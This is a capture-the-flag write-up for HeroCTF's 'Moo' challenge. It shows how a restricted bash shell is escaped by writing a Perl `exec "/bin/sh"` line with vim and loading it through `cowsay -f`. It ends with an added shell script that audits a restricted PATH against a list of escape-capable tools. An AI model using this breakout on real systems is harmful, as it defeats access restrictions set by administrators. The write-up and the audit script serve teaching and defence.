# misc/Moo

We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag.

```
ssh -p 11380 dyn05.heroctf.fr
user@dyn05.heroctf.fr's password:
Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202
 ______________________________________________________
/ Welcome dear CTF player! You can read the flag with: \
\ /bin/sudo /bin/cat /flag.txt. Or can you?...         /
 ------------------------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
```

When we try to run the commands, we see we're in a restricted shell:

```
user@moo:~$ /bin/sudo /bin/cat /flag.txt
bash: /bin/sudo: restricted: cannot specify `/' in command names
```

Let's take a look at our environment a bit with `env`:

```
bash: env: command not found
```

The next thing to do is look at what our `PATH` is set to:

```
user@moo:~$ echo $PATH
/usr/local/rbin
```

Attempting to override `PATH` fails as well, because the variable is read-only:

```
user@moo:~$ PATH=/bin sudo id
bash: PATH: readonly variable
bash: sudo: command not found
```

Well, let's see what is actually available to us in the only `PATH` directory we have:

```
user@moo:~$ ls -la $PATH
total 24
drwxr-xr-x 1 root root 4096 Oct 25 18:18 .
drwxr-xr-x 1 root root 4096 Oct 25 18:18 ..
lrwxrwxrwx 1 root root 17 Oct 25 18:18 cowsay -> /usr/games/cowsay
lrwxrwxrwx 1 root root 18 Oct 25 18:18 dircolors -> /usr/bin/dircolors
lrwxrwxrwx 1 root root 7 Oct 25 18:18 ls -> /bin/ls
-rwxr-xr-x 1 root root 206 Oct 25 17:35 rbash
-rwxr-xr-x 1 root root 54 Oct 25 17:35 vim
```

This reveals a few things:
- We are in a restricted bash shell (`rbash`)
- We have `cowsay`

So we use `cowsay` as the GTFOBin that it is. However, we cannot redirect output to create the file it needs. Luckily, we have
`vim`.

After putting our breakout (`exec "/bin/sh";`) into a file with `vim`, we can run it with `cowsay`, which evaluates the file given to `-f` as Perl:

```
cowsay -f tmp x
```

This gives us a full unrestricted shell, and we can now `cat` the flag:

```
PATH=/bin
Hero{s0m3_s4cr3d_c0w}
```
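
Seen from the admin's side, the `ls -la $PATH` listing above is exactly what should be audited before handing out a restricted shell. The script below is an added example, not part of the challenge or the original writeup: the `RISKY` list is a non-exhaustive assumption, and `make_sample` builds a constructed stand-in for `/usr/local/rbin` so it runs offline.

```shell
#!/bin/sh
# Audit a restricted-shell PATH directory for entries that defeat the restriction.
# RISKY: tools known to run commands or code (assumed, non-exhaustive list).
RISKY="cowsay vim vi perl python3 awk find less man ed"

# Print "<name> <verdict>" for every entry in the directory given as $1.
audit_rbin() {
    for entry in "$1"/*; do
        [ -e "$entry" ] || continue
        name=$(basename "$entry")
        target=$(readlink -f "$entry")   # follow symlinks to the real file
        verdict="ok"
        # A script target exposes its interpreter to the user: review by hand.
        if [ "$(head -c 2 "$target")" = "#!" ]; then
            verdict="REVIEW script run by $(head -n 1 "$target" | cut -c3-)"
        fi
        # A known escape-capable tool, matched by link name or target name.
        for r in $RISKY; do
            if [ "$name" = "$r" ] || [ "$(basename "$target")" = "$r" ]; then
                verdict="RISK can run commands or code"
            fi
        done
        echo "$name $verdict"
    done
}

# Constructed sample mirroring the listing above (stand-in files, not real binaries).
make_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/rbin" "$root/games" "$root/bin"
    printf '#!/usr/bin/perl\n' > "$root/games/cowsay"
    printf '\177ELF' > "$root/bin/ls"
    printf '\177ELF' > "$root/bin/dircolors"
    ln -s "$root/games/cowsay" "$root/rbin/cowsay"
    ln -s "$root/bin/ls" "$root/rbin/ls"
    ln -s "$root/bin/dircolors" "$root/rbin/dircolors"
    printf '#!/bin/sh\n' > "$root/rbin/rbash"   # wrapper contents are assumed
    printf '#!/bin/sh\n' > "$root/rbin/vim"     # wrapper contents are assumed
    echo "$root/rbin"
}

audit_rbin "$(make_sample)"
```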